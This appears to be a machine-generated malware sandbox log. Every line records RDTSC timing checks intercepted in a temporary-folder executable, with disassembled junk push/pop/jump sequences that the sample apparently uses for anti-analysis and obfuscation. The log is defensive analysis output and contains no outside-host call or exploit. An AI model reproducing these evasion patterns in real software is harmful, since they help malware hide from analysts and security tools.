Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F96797 second address: F967DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F4E3C536588h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jl 00007F4E3C536587h 0x00000028 cmc 0x00000029 push 0000001Eh 0x0000002b jmp 00007F4E3C53658Ah 0x00000030 nop 0x00000031 push eax 0x00000032 push edx 0x00000033 jnl 00007F4E3C53658Ch 0x00000039 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F967DD second address: F967FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F96AC4 second address: F96AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F5946F second address: F59480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3CF4808Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F59480 second address: F594AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4E3C536595h 0x0000000f jmp 00007F4E3C53658Bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F594AB second address: F594B0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCE336 second address: FCE34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C53658Bh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD1C55 second address: FD1C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD1C5C second address: FD1C96 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4E3C53658Eh 0x00000008 jns 00007F4E3C536586h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 jl 00007F4E3C536586h 0x00000017 jc 00007F4E3C536586h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F4E3C53658Eh 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD1C96 second address: FD1CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD1CA5 second address: FD1CAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD89EA second address: FD89F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD89F4 second address: FD89FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD76ED second address: FD775A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F4E3CF48097h 0x0000000f jng 00007F4E3CF48092h 0x00000015 jbe 00007F4E3CF48086h 0x0000001b jbe 00007F4E3CF48086h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4E3CF48090h 0x0000002b jmp 00007F4E3CF48097h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD775A second address: FD7760 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD7760 second address: FD7780 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F4E3CF48086h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F4E3CF48086h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4E3CF4808Ch 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD82F2 second address: FD82F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD8440 second address: FD844C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F4E3CF48086h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD844C second address: FD846B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F4E3C536595h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FD846B second address: FD846F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDB9FF second address: FDBA04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDBA04 second address: FDBA11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDBA11 second address: FDBA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDBA15 second address: FDBA1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE0D62 second address: FE0D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE0D66 second address: FE0D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4E3CF48094h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE0D82 second address: FE0D9D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4E3C536596h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE0D9D second address: FE0DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jmp 00007F4E3CF4808Eh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDF98D second address: FDF991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDF991 second address: FDF9A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4E3CF48086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDF9A0 second address: FDF9AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4E3C536586h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDFB3A second address: FDFB40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDFF38 second address: FDFF57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F4E3C536599h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDFF57 second address: FDFF5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FDFF5B second address: FDFF61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE034C second address: FE035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4E3CF48086h 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE035C second address: FE0362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE0B97 second address: FE0BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3CF48094h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE0BAF second address: FE0BB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE3851 second address: FE388A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4E3CF48090h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F4E3CF48086h 0x00000017 jl 00007F4E3CF48086h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE388A second address: FE3897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F4E3C536586h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE3897 second address: FE389B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE5B63 second address: FE5B72 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4E3C536586h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FE5D05 second address: FE5D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEA8A8 second address: FEA8AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEA8AD second address: FEA8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEE89F second address: FEE8A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEBA1 second address: FEEBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEBA5 second address: FEEBC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536596h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEBC3 second address: FEEBC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEBC7 second address: FEEBD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F4E3C536586h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEBD3 second address: FEEBD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEEA6 second address: FEEEB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEEB2 second address: FEEEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEEB6 second address: FEEEBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEEBC second address: FEEED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F4E3CF4808Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEEED4 second address: FEEEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEF9B9 second address: FEF9C4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEF9C4 second address: FEF9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEF9CE second address: FEF9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FEF9DA second address: FEF9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF2D4E second address: FF2D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF2EEE second address: FF2EF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF2EF4 second address: FF2EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF32CF second address: FF32D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF32D3 second address: FF32D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF32D7 second address: FF32DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF32DD second address: FF32E2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF32E2 second address: FF32E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FFA3E8 second address: FFA3EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FFA3EE second address: FFA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F4E3C53658Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4E3C53658Bh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8349 second address: FF834D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF834D second address: FF8363 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E3C536586h 0x00000008 jmp 00007F4E3C53658Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8363 second address: FF8386 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F4E3CF48086h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4E3CF4808Fh 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8386 second address: FF8390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F4E3C536586h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8390 second address: FF8396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF84FF second address: FF8505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8663 second address: FF8670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007F4E3CF4808Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8938 second address: FF894A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4E3C53658Eh 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF894A second address: FF8996 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E3CF48098h 0x00000008 jmp 00007F4E3CF4808Ah 0x0000000d jmp 00007F4E3CF48097h 0x00000012 push edx 0x00000013 pop edx 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F4E3CF48086h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8996 second address: FF899A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF899A second address: FF89A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF89A4 second address: FF89A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8FB6 second address: FF8FBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8FBA second address: FF8FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8FC5 second address: FF8FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8FCA second address: FF8FCF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF8FCF second address: FF8FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF95D7 second address: FF95DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FF95DB second address: FF95DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
